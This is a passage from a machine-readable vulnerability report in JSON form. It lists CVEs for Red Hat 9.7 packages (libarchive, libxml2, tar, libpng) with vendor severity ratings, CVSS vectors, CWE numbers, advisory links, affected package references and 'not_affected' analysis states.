          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-5917",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw involves an 'off-by-one' miscalculation when handling prefixes and suffixes for file names. This can lead to a 1-byte write overflow. While seemingly small, such an overflow can corrupt adjacent memory, leading to unpredictable program behavior, crashes, or in specific circumstances, could be leveraged as a building block for more sophisticated exploitation. This bug affects libarchive versions prior to 3.8.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5917"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5917"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370874"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2588"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5917"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5917"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2025-12-12T01:15:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.5.3-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-5918",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw can be triggered when file streams are piped into bsdtar, potentially allowing for reading past the end of the file. This out-of-bounds read can lead to unintended consequences, including unpredictable program behavior, memory corruption, or a denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5918"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5918"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370877"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2584"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5918"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5918"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2025-08-15T18:35:04+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.5.3-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-60753",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        400,
        835
      ],
      "description": "An issue was discovered in libarchive bsdtar before version 3.8.1 in function apply_substitution in file tar/subst.c when processing crafted -s substitution rules. This can cause unbounded memory allocation and lead to denial of service (Out-of-Memory crash).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-60753"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-60753"
        },
        {
          "url": "https://github.com/Papya-j/CVE/tree/main/CVE-2025-60753"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/2725"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60753"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-60753"
        }
      ],
      "published": "2025-11-05T16:15:40+00:00",
      "updated": "2026-02-04T21:19:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.5.3-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-6170",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        121
      ],
      "description": "A flaw was found in the interactive shell of the xmllint command-line tool, used for parsing XML files. When a user inputs an overly long command, the program does not check the input size properly, which can cause it to crash. This issue might allow attackers to run harmful code in rare configurations without modern protections.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-6170"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-6170"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2372952"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/941"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00014.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6170"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7694-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-6170"
        }
      ],
      "published": "2025-06-16T16:15:20+00:00",
      "updated": "2026-04-19T20:16:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.9.13-14.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-64118",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        362,
        367
      ],
      "description": "node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-64118"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-64118"
        },
        {
          "url": "https://github.com/isaacs/node-tar"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9"
        },
        {
          "url": "https://github.com/isaacs/node-tar/issues/445"
        },
        {
          "url": "https://github.com/isaacs/node-tar/pull/446"
        },
        {
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64118"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-64118"
        }
      ],
      "published": "2025-10-30T18:15:33+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2",
          "versions": [
            {
              "version": "2:1.34-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-64505",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to version 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_do_quantize function when processing PNG files with malformed palette indices. The vulnerability occurs when palette_lookup array bounds are not validated against externally-supplied image data, allowing an attacker to craft a PNG file with out-of-range palette indices that trigger out-of-bounds memory access. This issue has been patched in version 1.6.51.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-64505"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-64505"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37"
        },
        {
          "url": "https://github.com/pnggroup/libpng/pull/748"
        },
        {
          "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-4952-h5wq-4m42"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64505"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7924-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8081-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-64505"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/11/22/1"
        }
      ],
      "published": "2025-11-25T00:15:47+00:00",
      "updated": "2025-11-26T18:28:32+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-12.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-64506",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_write_image_8bit function when processing 8-bit images through the simplified write API with convert_to_8bit enabled. The vulnerability affects 8-bit grayscale+alpha, RGB/RGBA, and images with incomplete row data. A conditional guard incorrectly allows 8-bit input to enter code expecting 16-bit input, causing reads up to 2 bytes beyond allocated buffer boundaries. This issue has been patched in version 1.6.51.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-64506"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-64506"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/2bd84c019c300b78e811743fbcddb67c9d9bf821"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/2bd84c019c300b78e811743fbcddb67c9d9bf821"
        },
        {
          "url": "https://github.com/pnggroup/libpng/pull/749"
        },
        {
          "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-qpr4-xm66-hww6"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64506"
        },
        {
